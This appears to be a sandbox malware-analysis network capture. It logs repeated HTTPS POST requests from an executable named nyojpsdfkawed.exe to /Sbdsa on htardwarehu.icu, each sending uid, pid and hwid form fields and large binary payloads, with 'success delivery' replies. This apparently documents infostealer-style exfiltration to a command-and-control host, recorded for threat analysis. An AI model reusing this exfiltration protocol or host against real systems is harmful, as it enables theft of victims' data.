2025-03-13 13:52:34 UTC	14461	OUT	Data Raw: 2d 2d 30 68 62 79 58 49 6f 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 62 34 35 63 39 34 34 34 35 31 63 37 34 62 31 32 34 32 62 37 35 61 33 37 63 62 61 30 31 37 64 33 0d 0a 2d 2d 30 68 62 79 58 49 6f 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 68 62 79 58 49 6f 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 41 34 32 41 32 43 36 36 46 31 37 45 44 32 31 37 33 35 37 41 32 33 32 30 41 46 33 35 43 37 0d 0a 2d 2d 30 68 62 79 58 49 6f Data Ascii: --0hbyXIo5Content-Disposition: form-data; name="uid"b45c944451c74b1242b75a37cba017d3--0hbyXIo5Content-Disposition: form-data; name="pid"2--0hbyXIo5Content-Disposition: form-data; name="hwid"AEA42A2C66F17ED217357A2320AF35C7--0hbyXIo
2025-03-13 13:52:35 UTC	812	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 13:52:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iId9JzWFp9Q8BBLFQV6m4Ba4PFwX7ifl9Q3y5WujWwBIqu7s9lqsgptIwfGgfMxSwEkjAphIe3SrzLa7GSiUVJm7JwSgcSP0n9Lq6lO6ay0zs8JZyIX4W0%2BMABs5hCjLvX0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fc033b5e641786-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=17967&min_rtt=13465&rtt_var=7826&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2838&recv_bytes=15392&delivery_rate=214884&cwnd=229&unsent_bytes=0&cid=f26547a5b34eb792&ts=900&x=0"
2025-03-13 13:52:35 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 34 2e 31 31 30 2e 32 32 33 2e 31 34 38 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 74.110.223.148"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49684	104.21.48.1	443	7024	C:\Users\user\Desktop\nyojpsdfkawed.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 13:52:37 UTC	281	OUT	POST /Sbdsa HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=i88Ef6g798qf3t8K User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15047 Host: htardwarehu.icu
2025-03-13 13:52:37 UTC	15047	OUT	Data Raw: 2d 2d 69 38 38 45 66 36 67 37 39 38 71 66 33 74 38 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 62 34 35 63 39 34 34 34 35 31 63 37 34 62 31 32 34 32 62 37 35 61 33 37 63 62 61 30 31 37 64 33 0d 0a 2d 2d 69 38 38 45 66 36 67 37 39 38 71 66 33 74 38 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 69 38 38 45 66 36 67 37 39 38 71 66 33 74 38 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 41 34 32 41 32 43 36 36 46 31 37 45 44 32 31 37 33 Data Ascii: --i88Ef6g798qf3t8KContent-Disposition: form-data; name="uid"b45c944451c74b1242b75a37cba017d3--i88Ef6g798qf3t8KContent-Disposition: form-data; name="pid"2--i88Ef6g798qf3t8KContent-Disposition: form-data; name="hwid"AEA42A2C66F17ED2173
2025-03-13 13:52:38 UTC	821	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 13:52:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WUot1Mp4foIIgMhiFTNTvjrfLpra2%2Bz%2BDpHoWInw7DICWMB0UAx42RZ5gNa5iehTGG9ha2VmyG0OaUK6g%2Bs%2BzaEmEfj0wHhGn2sih7%2BPSLpk6H9jL%2FxJw9OkbzatzMwuVIc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fc034cfb8c6fce-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18734&min_rtt=15429&rtt_var=7304&sent=7&recv=18&lost=0&retrans=0&sent_bytes=2837&recv_bytes=15986&delivery_rate=187589&cwnd=246&unsent_bytes=0&cid=5b7c6a7d96af8eeb&ts=935&x=0"
2025-03-13 13:52:38 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 34 2e 31 31 30 2e 32 32 33 2e 31 34 38 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 74.110.223.148"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49685	104.21.48.1	443	7024	C:\Users\user\Desktop\nyojpsdfkawed.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 13:52:39 UTC	281	OUT	POST /Sbdsa HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=oTl4ZQfOGhXwQHi7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20216 Host: htardwarehu.icu
2025-03-13 13:52:39 UTC	15331	OUT	Data Raw: 2d 2d 6f 54 6c 34 5a 51 66 4f 47 68 58 77 51 48 69 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 62 34 35 63 39 34 34 34 35 31 63 37 34 62 31 32 34 32 62 37 35 61 33 37 63 62 61 30 31 37 64 33 0d 0a 2d 2d 6f 54 6c 34 5a 51 66 4f 47 68 58 77 51 48 69 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 6f 54 6c 34 5a 51 66 4f 47 68 58 77 51 48 69 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 41 34 32 41 32 43 36 36 46 31 37 45 44 32 31 37 33 Data Ascii: --oTl4ZQfOGhXwQHi7Content-Disposition: form-data; name="uid"b45c944451c74b1242b75a37cba017d3--oTl4ZQfOGhXwQHi7Content-Disposition: form-data; name="pid"3--oTl4ZQfOGhXwQHi7Content-Disposition: form-data; name="hwid"AEA42A2C66F17ED2173
2025-03-13 13:52:39 UTC	4885	OUT	Data Raw: 1e 5b a9 9d 67 46 01 19 14 44 49 06 e1 1b 88 1a af 9f b1 3a ae c4 74 1c 2d 4b 80 96 1c e8 54 1e 95 d8 53 61 e5 af c1 b1 8a 96 10 9c 47 ca aa 5b ee ae 5d 55 e2 65 b7 3a 08 3c 30 0c 8d 8c 4e 42 0c c7 ff 69 59 99 81 58 30 39 82 74 7f 86 0b 4e 0b e2 ab 7f e2 2f 51 cf 45 51 fa 1a 61 86 d4 d8 8f 71 ba 56 85 5d 40 23 0f e3 c2 0c a2 9a 78 6f b5 26 cc ac 8d e4 c9 aa 20 67 b5 44 cb 4d 7c 85 ad c4 a8 d1 6d 80 ad 04 e5 7e 1d 7a f2 8a 90 fc 10 db 59 6c a1 68 c9 4b d1 7a e2 46 68 a7 a3 0c 33 25 e2 40 5e 79 ce cd 2a 7a c6 96 81 c9 15 6d 83 8a 54 aa 21 8e 03 01 2f a8 08 96 81 70 8a eb 58 d3 5d 1d 25 1c c0 a8 8b 54 47 f1 aa fb cf cc 1c e8 96 fe 42 65 55 40 8e de 08 5e 80 39 d2 4e 1e ba b8 cf d9 c8 18 66 f0 27 91 b7 54 3f f3 ab 33 5a 01 98 0e 1c c2 40 6f db bd 3d fa 9c 08 Data Ascii: [gFDI:t-KTSaG[]Ue:<0NBiYX09tN/QEQaqV]@#xo& gDM\|m~zYlhKzFh3%@^y*zmT!/pX]%TGBeU@^9Nf'T?3Z@o=
2025-03-13 13:52:40 UTC	812	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 13:52:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tKJYZx4PRf0BoIxdWwArP3z%2FinEbyyFbNAZsByalb8d7SAjXQH1QajBXMqgP5sXCehcAswAPmqQzIiiIPoRWjLcXiKhUXEmkKU02SfTTHaQxsa8xWRI12a3oEWDW63G73Ek%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fc035adc055008-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18332&min_rtt=13886&rtt_var=7896&sent=12&recv=23&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21177&delivery_rate=208480&cwnd=247&unsent_bytes=0&cid=e3581b3a906bebe1&ts=960&x=0"
2025-03-13 13:52:40 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 34 2e 31 31 30 2e 32 32 33 2e 31 34 38 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 74.110.223.148"}}
2025-03-13 13:52:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49686	104.21.48.1	443	7024	C:\Users\user\Desktop\nyojpsdfkawed.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 13:52:42 UTC	272	OUT	POST /Sbdsa HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=3N1gfm1E User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 2390 Host: htardwarehu.icu
2025-03-13 13:52:42 UTC	2390	OUT	Data Raw: 2d 2d 33 4e 31 67 66 6d 31 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 62 34 35 63 39 34 34 34 35 31 63 37 34 62 31 32 34 32 62 37 35 61 33 37 63 62 61 30 31 37 64 33 0d 0a 2d 2d 33 4e 31 67 66 6d 31 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 4e 31 67 66 6d 31 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 41 34 32 41 32 43 36 36 46 31 37 45 44 32 31 37 33 35 37 41 32 33 32 30 41 46 33 35 43 37 0d 0a 2d 2d 33 4e 31 67 66 6d 31 Data Ascii: --3N1gfm1EContent-Disposition: form-data; name="uid"b45c944451c74b1242b75a37cba017d3--3N1gfm1EContent-Disposition: form-data; name="pid"1--3N1gfm1EContent-Disposition: form-data; name="hwid"AEA42A2C66F17ED217357A2320AF35C7--3N1gfm1
2025-03-13 13:52:43 UTC	813	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 13:52:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MfeB1sdaryJG3DOV%2Fq3GmuUCQzlr9j9HEhSsqAmuLWFe6okBCz2GogRWJxTOwFwSzkXbBACtRxXmY5pdebBwBOw515uLtSYkUn4n%2FWTC24Szs2wBipCF%2FhJlR2ff097YbVE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fc036d0e2ac974-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18955&min_rtt=16375&rtt_var=6920&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2837&recv_bytes=3298&delivery_rate=176800&cwnd=239&unsent_bytes=0&cid=d6a17548e3a13b38&ts=807&x=0"
2025-03-13 13:52:43 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 34 2e 31 31 30 2e 32 32 33 2e 31 34 38 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 74.110.223.148"}}
2025-03-13 13:52:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49687	104.21.48.1	443	7024	C:\Users\user\Desktop\nyojpsdfkawed.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 13:52:45 UTC	284	OUT	POST /Sbdsa HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=0gFhk93Q6ddFe08VXV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 570755 Host: htardwarehu.icu
2025-03-13 13:52:45 UTC	15331	OUT	Data Raw: 2d 2d 30 67 46 68 6b 39 33 51 36 64 64 46 65 30 38 56 58 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 62 34 35 63 39 34 34 34 35 31 63 37 34 62 31 32 34 32 62 37 35 61 33 37 63 62 61 30 31 37 64 33 0d 0a 2d 2d 30 67 46 68 6b 39 33 51 36 64 64 46 65 30 38 56 58 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 67 46 68 6b 39 33 51 36 64 64 46 65 30 38 56 58 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 41 34 32 41 32 43 36 36 46 31 37 Data Ascii: --0gFhk93Q6ddFe08VXVContent-Disposition: form-data; name="uid"b45c944451c74b1242b75a37cba017d3--0gFhk93Q6ddFe08VXVContent-Disposition: form-data; name="pid"1--0gFhk93Q6ddFe08VXVContent-Disposition: form-data; name="hwid"AEA42A2C66F17
2025-03-13 13:52:45 UTC	15331	OUT	Data Raw: e3 33 21 f8 e3 f3 c4 ce 34 5a 32 da f5 d5 3c 1e 44 ff 44 10 6c db 0d e9 8b 14 14 7c 9a 1a ff e6 fa fb 8c 2d 8a cf c1 69 7f 44 a8 9a 0f 95 ef e4 1d f9 9f 11 89 76 66 30 f0 57 44 de 50 8f c5 b8 da d1 2e f2 35 9b 51 4c 04 c5 7e d2 bd 4b ae a1 31 58 e3 05 96 1f 09 8e 5a 9e 10 9e a9 50 0a 8b 76 93 8d e2 3d be a5 b0 87 da 11 e1 44 71 4d 95 c5 d4 6b 8d 5f 9c be 42 bd 6a c8 37 b6 d2 61 c7 36 db 75 bf b4 3b 07 63 91 0b a0 97 45 66 51 47 10 5f a2 2a 69 41 74 9a 89 1b bd 7f f9 d2 6a 74 a7 43 cb d3 d7 28 10 0b 82 15 a0 7d 00 c6 66 58 8f 1e 6a 6e 8c 27 95 ae 3c 16 f3 c7 7a 0a 72 84 b7 20 bd 44 28 47 ba 78 26 61 37 10 40 5c 17 39 57 7c 40 8d ea b9 57 fe 0e 13 2a e1 32 06 5d 0b c9 a1 33 10 d3 ea db 18 b1 3d 13 cb 32 49 3d cd ba f3 d3 58 bc 10 a2 50 21 19 bf 1b 13 89 1e Data Ascii: 3!4Z2<DDl\|-iDvf0WDP.5QL~K1XZPv=DqMk_Bj7a6u;cEfQG_iAtjtC(}fXjn'<zr D(Gx&a7@\9W\|@W2]3=2I=XP!
2025-03-13 13:52:45 UTC	15331	OUT	Data Raw: 29 e9 e5 65 3a f2 cf 62 3a 59 47 52 b2 7d 29 25 d6 2a 00 4e a6 04 7d 1f 0c fa 13 34 62 3a 76 5e 0c a2 43 dd 74 e6 cd bc c4 8d 18 66 50 91 eb 14 1d e8 78 06 82 ac d1 56 fd 84 03 8f 5b a1 ce 60 8e 6c 1d 7f df b7 a4 84 94 4a ac e3 97 fb 14 f1 e1 6b 37 53 d3 82 21 73 1c b4 41 06 f7 d9 d6 31 94 91 ea 7f ca d3 15 ff 8d fb 86 03 85 ee ba 85 58 55 3a 5a 3d 3c 81 50 a2 c0 45 e1 e5 07 25 86 4f 16 bd b8 8b ca c6 53 4a 5b e8 b7 b9 6a d8 6c 69 a1 66 6f 7b 45 a8 fb 42 c5 2c 0c fa 5b f9 9e 65 03 9a 8f e5 e4 00 19 6d 2e 91 c5 49 2f 12 07 8f de de 0d 69 cc 01 91 9e a2 33 ee ec aa f0 65 a1 cc b2 fa c3 5c b1 8c 89 3b ef 5b 60 30 9f 83 92 40 bc 1b a8 1d d9 66 1d 14 22 70 ee 84 f6 95 29 26 a6 d3 d9 79 3a 48 34 04 6f e5 8c 1b 15 c5 69 7c 52 27 81 74 2e 5d 27 ce 85 98 99 e3 04 Data Ascii: )e:b:YGR})%*N}4b:v^CtfPxV[`lJk7S!sA1XU:Z=<PE%OSJ[jlifo{EB,[em.I/i3e\;[`0@f"p)&y:H4oi\|R't.]'
2025-03-13 13:52:45 UTC	15331	OUT	Data Raw: ae d0 3b 7d d1 54 56 92 2b d2 dc 49 c0 15 26 5d e1 45 0a 59 4d 8a e6 77 e4 7c ea 2e 62 ee e8 0f 9f f6 f0 28 00 fb 3a 98 06 54 5e 85 5a ad d5 d1 7f 58 4f 81 c1 51 23 68 52 80 71 2a f7 ff 67 11 e1 4b 6a 03 c0 e1 13 e1 66 25 95 b0 e9 9c 04 55 05 39 2f 41 40 ce 93 39 3e fe 56 05 ff 40 c9 6c 40 7e 91 fa 28 15 7b 29 5a 4e b3 1b f9 8b 23 5b 2e 07 05 27 63 ed 52 74 37 fb 1a 46 78 a2 c8 a0 18 5e 38 3b 88 ed 52 b4 f5 64 a6 35 15 e5 fa d6 37 72 90 06 c3 7d 25 ec 94 3b 97 63 de d5 88 14 62 4b ba ee a5 00 12 db 74 43 3e 32 5b 08 c9 17 fd f1 6c 8c 48 ab 81 ba a5 c5 51 a8 e6 9e bc ae 2c ac 30 80 8f d2 39 24 ce 65 99 ce e8 a5 3f 48 16 0e 43 c6 b4 a6 f1 a1 f0 99 11 1b c6 c6 23 e2 f5 3c 28 30 f4 29 76 1e 38 9f b8 c0 04 df be de a2 3d e4 bf de 33 d0 14 e9 04 b8 83 ce 2f cf Data Ascii: ;}TV+I&]EYMw\|.b(:T^ZXOQ#hRq*gKjf%U9/A@9>V@l@~({)ZN#[.'cRt7Fx^8;Rd57r}%;cbKtC>2[lHQ,09$e?HC#<(0)v8=3/
2025-03-13 13:52:45 UTC	15331	OUT	Data Raw: 88 95 9b 60 44 f8 30 7a 49 f9 0a 6a 9b cd 38 10 29 96 91 b2 72 43 80 1b 4b 9a 49 f2 21 a6 1e 6d d9 f6 51 f0 ca ba e5 78 3e db 92 8c 3e 57 ce b2 ab c9 23 73 79 a1 64 33 38 94 d8 fc 1a 94 ed 8c b1 9a 96 65 b2 ac d4 ab ff 9a 6f 63 2e cd a7 9e ec 46 4c c3 8b e5 aa 4f cb 56 81 48 40 2a 00 89 c6 3e 4c fc f7 6d f7 47 ec fe c7 80 ce 14 4a a0 6e 65 60 d9 19 63 c6 2b ee 08 7d f9 87 2c 07 ff 97 12 94 16 18 47 b2 0e 2e 8e 3e bc 5d ba ce 72 f6 d3 b9 19 25 f4 91 05 2e 03 62 8d b3 5b c7 56 cf e7 5c b2 5b ae be 7e 4e 8c 8d 87 6e ee a8 36 2b 4b 90 c5 1b 7b ac cc b4 45 3f ea df a8 43 65 fd c1 1a cb 7d c6 7e 5c a5 dc 4f 65 79 12 b3 9e 47 55 c1 bd 84 62 97 be 24 7d db 1b 58 94 d3 9b 51 95 fc 56 75 6a d7 ea da dd 9c 13 72 c2 b8 8d 4f db 36 ef a8 04 a1 ed 20 f4 42 4e 94 8f fa Data Ascii: `D0zIj8)rCKI!mQx>>W#syd38eoc.FLOVH@*>LmGJne`c+},G.>]r%.b[V\[~Nn6+K{E?Ce}~\OeyGUb$}XQVujrO6 BN
2025-03-13 13:52:45 UTC	15331	OUT	Data Raw: c1 60 45 b8 15 03 65 fb 61 a1 be 87 f7 bc 9f 4c 6f 6d ee db ab 51 b2 44 8a ea 33 bd 70 d2 e4 e6 4d ca d3 2b 94 83 d1 36 30 b9 bd 67 3a c7 dc f5 62 f4 d5 a5 23 98 67 ab 5a d6 1a 27 a0 c8 4c 67 15 e5 0e 79 12 31 cf b3 06 58 a3 7a 5f 3f b9 10 d6 8d 17 f3 d3 d6 c0 36 87 50 08 01 1b f6 80 63 e4 dd aa 36 54 43 32 f9 e1 3b 8a 81 ce b7 37 6c d0 c1 2c 76 de c3 85 0c 2a 85 90 bf 39 05 c6 b5 b6 80 a0 01 91 7d f2 50 96 25 64 9b 86 5c 2a 9c 12 6e 4b aa d3 79 33 9a a8 25 6b a8 c7 db de 26 4c b6 68 f5 2e 1d 36 1a da ae 48 3a e2 39 bd bb 7e ef a5 2f d9 ea e6 e6 33 78 44 56 7e 73 60 f5 0d dc 66 6b 42 8d a4 6d 86 5c 46 76 79 70 33 60 c3 90 8e 5e 9f 24 7c 4d a4 14 7b 6e 25 72 fe 6f 6a 54 49 99 bf ca 83 b1 30 e8 f2 83 e8 b9 6e 5a 5a e4 5c 3f b7 03 c4 20 72 70 fb 22 13 8e 93 Data Ascii: `EeaLomQD3pM+60g:b#gZ'Lgy1Xz_?6Pc6TC2;7l,v9}P%d\nKy3%k&Lh.6H:9~/3xDV~s`fkBm\Fvyp3`^$\|M{n%rojTI0nZZ\? rp"
2025-03-13 13:52:45 UTC	15331	OUT	Data Raw: e9 d4 93 57 ba dd 85 7e 3e 2c 2b c2 b3 82 64 75 ca 32 f0 fc da 47 5d 38 6c 68 44 04 71 27 8c 2d bd 8d 75 42 c1 49 5c 17 28 b7 50 ae 29 40 e0 dd 18 38 0c c3 87 be ff 3e 46 81 9e b0 9e 95 0f 18 9c 19 65 b1 28 d5 99 44 11 b5 29 79 99 0d dc 10 f9 ae e7 7b 0d c6 53 3e 0e e2 44 3d a2 ff e5 b2 86 87 67 1c b9 05 db 76 db cd 1d 99 72 5b 88 f9 e5 f3 b4 4b 4c 4d ae df 31 a6 e3 4d 3a e5 d4 15 66 31 d0 33 48 35 7d 6e 67 c2 41 19 88 7c 96 fa c6 2f bf ac af b6 d5 56 03 6d da 9d f9 a7 ab d0 5e 6b 5f 50 18 ed 32 40 f5 40 5a 2c 85 4f 2a cc 31 86 39 a2 0c 22 c6 8a 7d 91 5c 67 84 9c 9f 88 5f 98 b1 7a dc c8 ec 56 11 29 36 e6 83 ca 85 50 9d ac a8 00 61 ec 42 29 f1 e3 f2 9a 66 e8 f9 4a 39 ce 13 01 02 0f 9c aa 1a 87 61 50 88 fc 4a c1 0e 31 0c c4 1f 03 cf 97 1e 32 14 e9 8c 35 12 Data Ascii: W~>,+du2G]8lhDq'-uBI\(P)@8>Fe(D)y{S>D=gvr[KLM1M:f13H5}ngA\|/Vm^k_P2@@Z,O*19"}\g_zV)6PaB)fJ9aPJ125
2025-03-13 13:52:45 UTC	15331	OUT	Data Raw: 07 19 86 cd e1 1d 29 44 13 f6 ec 1e de 22 62 f1 de e3 9e 2b d2 71 43 bf fa d5 3a ce 2b ea 75 fc 12 ef 97 1e 57 8d 0a ae 3c b5 7d 05 39 75 ab a7 10 fb f8 fa 7c 7e c4 9e c4 84 ca 5a a0 92 10 00 2c 12 cf 3e af 5d b0 19 96 92 7c 45 1c e2 e7 84 07 b1 b0 b1 37 cd 06 6f 27 65 bc b9 02 89 eb ab ab a0 fd ab 56 cc cb 5e ef 2b 6c ae 07 e8 0c a5 d4 e2 c2 94 d1 83 d2 b8 26 2c 6c a7 11 2d f7 5b 95 e5 67 a2 24 e1 d9 46 cb 9e 5f 32 35 0b 70 5c cf 86 eb ae 2f 13 ef c0 a5 f8 71 32 fc fa ec 8e ec 8a d4 54 02 27 2c f7 33 33 70 b6 e3 89 f6 68 ea 66 f0 e9 b6 3f 9a 54 38 a8 01 bf d7 8f d4 fd 4a d4 6d 34 e6 8d 46 fe be c7 c3 1c f0 51 5c fc 16 b2 29 a1 68 f5 69 6c 69 5f 6d ea 80 67 c9 2f 5f 16 50 03 ab 06 4c 78 bf 1f 10 f0 dd 45 cb 52 5f 4b 48 18 c7 6e 6a 55 8f 98 a4 47 f0 f8 8f Data Ascii: )D"b+qC:+uW<}9u\|~Z,>]\|E7o'eV^+l&,l-[g$F_25p\/q2T',33phf?T8Jm4FQ\)hili_mg/_PLxER_KHnjUG
2025-03-13 13:52:45 UTC	15331	OUT	Data Raw: 8b 08 d8 9d 40 d0 67 93 b3 0f a2 1f 9b 86 71 8f e3 eb cc 86 4a 37 a3 ef 69 7a 37 a8 dc 5d 51 a3 c5 52 c3 d9 19 fe 89 cb e6 9d 5b 79 47 50 b9 4a 40 6c 75 64 4e 49 cb d1 32 9c 11 6e 1e c0 f6 9d 82 d6 55 29 91 3b ec b4 9a d4 b8 02 5c 26 f9 58 2d 02 cd ba bb 1f 1a 99 e1 40 9e 78 d9 2b 19 11 0f 4d 29 b7 ec 22 6a d4 3a a0 49 aa d8 91 8f 41 b3 5c d7 54 c5 54 98 98 e4 c3 41 1f e8 be ef d7 03 bb bb 8d 5b f9 cd de 5d 14 b0 1b 65 53 23 f8 f2 67 24 5b 8e 13 98 df 67 1a 01 35 04 1a 36 01 a1 1c 17 dd 2f 01 af 43 d5 3b 62 79 26 7f 88 11 b0 a0 d1 8f 72 63 7d 2a 55 80 ae 74 9b 02 e3 af 4f d1 c1 0c 37 86 36 6c 94 5f cc b8 85 11 a2 72 82 85 d9 e6 7e a4 e2 03 d0 4d 1f 3e bd 5a 30 46 24 12 e5 59 15 bf 76 4b cd fd 41 f4 fc 1b e5 f3 50 33 bd 89 b6 7d aa fa 00 78 b6 9c b0 e7 a5 Data Ascii: @gqJ7iz7]QR[yGPJ@ludNI2nU);\&X-@x+M)"j:IA\TTA[]eS#g$[g56/C;by&rc}*UtO76l_r~M>Z0F$YvKAP3}x
